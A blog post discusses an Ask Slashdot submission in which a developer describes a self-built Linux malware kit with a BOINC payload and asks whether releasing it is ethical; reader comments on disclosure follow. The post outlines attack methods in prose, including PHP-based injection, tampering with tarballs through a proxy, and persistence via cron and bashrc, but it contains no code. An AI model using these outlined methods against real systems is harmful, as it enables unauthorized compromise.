Linux Malware – Proof that Linux is not as secure as we all think

There was an interesting post on Ask Slashdot discussing the ethics of releasing non-malicious Linux malware to simply prove a point to all of the people who rant and rave about Linux being so secure.  A developer by the name of buchner.johannes

buchner.johannes writes:

“I was fed up with the general consensus that Linux is oh-so-secure and has no malware. After a week of work, I finished a package of malware for Unix/Linux. Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects. The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads. I tested it to be injected by a PHP script (even circumventing safe mode), so that the Web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files. The aim of the exercise was to provide a payload so security people can ‘pwn’ systems to show security holes, without doing harm (such as deleting files or disrupting normal operation). But now I am unsure of whether it is ethically OK to release this toolkit, which, by ripping out the BOINC payload and putting in something really evil, could be turned into proper Linux malware. On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary. Technically, it is a nice piece, but should I release it? I don’t want to turn the Linux desktop into Windows, hence I’m slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?”

This is a great thing for the community at large to see that Linux can be exploited with malware just like it’s rival operating systems.  However, I share the same concerns the developer does.  This indeed could result in a black-hat user injecting something malicious into the code and actually turning the example into real evil malware. I’m on the fence though, maybe this is what Linux users need to prove that we aren’t like typical Windows users who click any random link and download any random software from any random untrusted third-party site.  A user who goes by the name of silentcoder wrote: “Linux users (hardly ever) download and install software from the internet. We download and install packages from repositories. The average user simply cannot tell the difference between a useful piece of freeware and a bugridden-malware-spreading piece of add-ware.”

Paranoia aside, this definitely proves that Linux is just as susceptible to malware and viruses as any other operating system.  But, as I’ve always said, viruses and malware are usually a result of user error, no matter the operating system.

What do you all think, should this type of code be released as proof of concept even if it’s risking malicious manipulation?  Should we all just start using SELinux and be done with it?

5 thoughts on “Linux Malware – Proof that Linux is not as secure as we all think

  1. There can be no OS which is completely secure but the question to look at should be how much of intervention or foolishness is required by the user to make the system/OS available for others to exploit. I was using a windows system for 3 yrs and did not a antivirus or firewall and still when tested with Antivirus and Anti-malware tools did not find anything suspicious.

  2. Release it to the kernel coders for all the big distros first.

    Give them 2 months to look at it.

    Tell them that.

    After the 2 months, release it on public channels and forums.

    That’s the responsible way to do things.

    First you’re giving them first chances to harden the system.

    Second, you’re putting them under a deadline. Which means they better look at it NOW.

    Third, if that still doesn’t work, now it’s public and let the chips fall where they may.

    Free source. Free information. That’s the way I see it.

  3. Maybe I have just spoken to reasonable users, but so far, every linux user I have asked has told me that linux is vunerable just like windows, the only difference is that viruses are not targeted to linux OS since is is a relatively small market share…

  4. So, the mad bomber attaches explosives to the pillar of the world trade center and detonates it. After the dust settles, they investigate and one of the people in the know says; The world trade center is very well built and it’s not possible to make it collapse by destroying a pillar. If they want it to come down, they would have to attack the frame of the building which is on the outside of the building.

    Do you really want to give the black hats all the tools they need to turn Linux security into Windows “security”?

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>